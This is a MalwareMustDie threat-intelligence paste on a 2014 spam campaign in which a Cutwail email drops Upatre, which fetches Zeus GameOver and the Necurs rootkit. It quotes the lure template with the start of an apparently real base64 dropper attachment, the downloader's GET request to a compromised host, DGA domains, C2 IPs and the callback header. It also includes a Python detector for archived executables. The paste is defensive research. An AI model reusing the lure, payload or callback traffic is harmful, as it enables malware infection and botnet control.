UPATRE ZZP of ZGMO campaign via Spam attachment

MalwareMustDie, Mar 26th, 2014
// #MalwareMustDie | @unixfreaxjp /malware/checkdomains]$ date
// Thu Mar 27 02:21:55 JST 2014
// UPATRE ZZP of ZGMO campaign via Spam attachment
// Project homebase: http://blog.malwaremustdie.org/2014/03/a-post-to-sting-zeus-p2pgameover-crooks.html

// Spambot template: type Cutwail (base64) version
// pic: https://lh6.googleusercontent.com/-VGE48Iutl5A/UzML27nroNI/AAAAAAAAPN8/UH1tP1YHv_o/s529/001.png

------=_Part_63352_2507082818.5786714685312
Content-Type: text/plain; charset=windows-1251; format=flowed
Content-Transfer-Encoding: 7bit

Message:

Number of Images: 1
Attachment File Type: PDF

// Boundary in (base64!!!)

------=_Part_63352_2507082818.5786714685312
Content-Type: application/zip;
 name="Scan_001.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
 name="Scan_001.zip"

UEsDBBQAAAAIAGA6eURlvioWSxwAAABKAAAMAAAAU2Nhbl8wMDEuZXhl7VwJXBTH0u8BFBQE
jxlNPEcF8QQWGEBRXC4PIgbEaBKCzALLkYeAwHok4hGPREefmEONLwooRk00KhGDR3RGFBRF

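As an added example, not part of the original paste: a Python check for the Cutwail spam template above. It constructs a message of the same shape (a text part announcing a PDF, then a base64 zip named Scan_001.zip whose only member is a harmless placeholder called Scan_001.exe, not the real dropper), walks the MIME parts, decodes each zip attachment and reports archive members with executable extensions alongside the file type the body claimed. The boundary string is the one in the paste; the addresses and the placeholder payload are constructed.

```python
import base64
import io
import re
import zipfile
from email import message_from_bytes
from email.policy import default
EXEC_EXT = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".js", ".vbs")  # dropper extensions
BOUNDARY = "----=_Part_63352_2507082818.5786714685312"  # boundary value seen in the paste


def build_sample_message() -> bytes:
    """Constructed sample in the shape of the Cutwail template: a text part claiming a PDF,
    then a base64 zip whose only member is a harmless placeholder named Scan_001.exe."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Scan_001.exe", b"constructed placeholder, not the real dropper")
    b64 = base64.encodebytes(buf.getvalue()).decode()
    return (
        "From: scanner@example.invalid\r\nTo: user@example.invalid\r\nSubject: Scan\r\n"
        f'MIME-Version: 1.0\r\nContent-Type: multipart/mixed; boundary="{BOUNDARY}"\r\n\r\n'
        f"--{BOUNDARY}\r\nContent-Type: text/plain; charset=windows-1251; format=flowed\r\n"
        "Content-Transfer-Encoding: 7bit\r\n\r\nMessage:\r\n\r\n"
        "Number of Images: 1\r\nAttachment File Type: PDF\r\n\r\n"
        f'--{BOUNDARY}\r\nContent-Type: application/zip; name="Scan_001.zip"\r\n'
        'Content-Transfer-Encoding: base64\r\nContent-Disposition: attachment; name="Scan_001.zip"\r\n'
        f"\r\n{b64}\r\n--{BOUNDARY}--\r\n"
    ).encode()


def find_archived_executables(raw: bytes) -> list[dict]:
    """Decode every zip attachment and report members with an executable extension,
    together with the file type the body text announced (the PDF lure above)."""
    msg = message_from_bytes(raw, policy=default)
    claimed = "unknown"
    for part in msg.walk():
        if part.get_content_type() == "text/plain":
            m = re.search(r"Attachment File Type:\s*(\w+)", part.get_content())
            claimed = m.group(1).lower() if m else claimed
    findings = []
    for part in msg.walk():
        name = part.get_filename() or ""  # falls back to the Content-Type name= parameter
        if part.get_content_type() != "application/zip" and not name.lower().endswith(".zip"):
            continue
        try:
            members = zipfile.ZipFile(io.BytesIO(part.get_payload(decode=True))).namelist()
        except zipfile.BadZipFile:
            members = []  # a corrupt archive deserves its own alert; out of scope here
        for member in members:
            if member.lower().endswith(EXEC_EXT):
                findings.append({"attachment": name, "member": member, "claimed_type": claimed})
    return findings
```
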
// Virus Total Check/Links:

Upatre (spam zip) https://www.virustotal.com/en/file/a3f1a5587129c9101808ff40421186f56fc32acbf2127cdeb54a8fb290907452/analysis/
Upatre (polymorph drop) https://www.virustotal.com/en/file/0a86782adae8a372823abb2293232657161eae5bae6243eea685545e0e5f7448/analysis/1395853555/
ZGMO (Downloaded/encoded) https://www.virustotal.com/en/file/e85446688c08dd62bb17a21255fe486eb2fb8ca4acc2e4ae974e31a4ad9dfbe0/analysis/1395853489/
ZGMO (Polymorph drop) https://www.virustotal.com/en/file/885d3f004200fcd507c0264f88746ee3f5a7a0e5c42f5b5512d6e5e80cc718c2/analysis/1395853466/
Rootkit (Necurs) https://www.virustotal.com/en/file/f1473d776bca32df38f449b5e4e82bdc58825aabf5b5ab03f02e0b3caaf2a661/analysis/

// Spambot source:
Received: from unknown (HELO ovh.fr) (109.190.52.100)
  by xx.xx.xx with SMTP; 26 Mar 2014 02:37:19 +0900

// Downloads ZGMO from: 91.235.171.231
URL: h00p://pazisnimase.com//wp-content/uploads/2014/03/TARGT.tis

// UPATRE GET HEADER:
GET /wp-content/uploads/2014/03/TARGT.tis HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: pazisnimase.com
Cache-Control: no-cache

// Zeus GMO LAME DGA Callback:

// Zeus GMO DGA ALIVE:
aulbbiwslxpvvphxnjij.biz,50.116.4.71,DNS1-5.REGISTRAR-SERVERS.COM
qkdapcqinizsczxrwaelaimznfbqq.biz,178.79.178.243,DNS1.NAMESECURE.COM

// Zeus GMO CNC Callbacks
CNC Callback 1 to 50.116.4.71
CNC Callback 2 to 178.79.178.243

// CNC Callback Header:
POST /write HTTP/1.1
Host: default
Accept-Encoding:
Connection: close
Content-Length: 326
X-ID: 5555

---
#MalwareMustdie!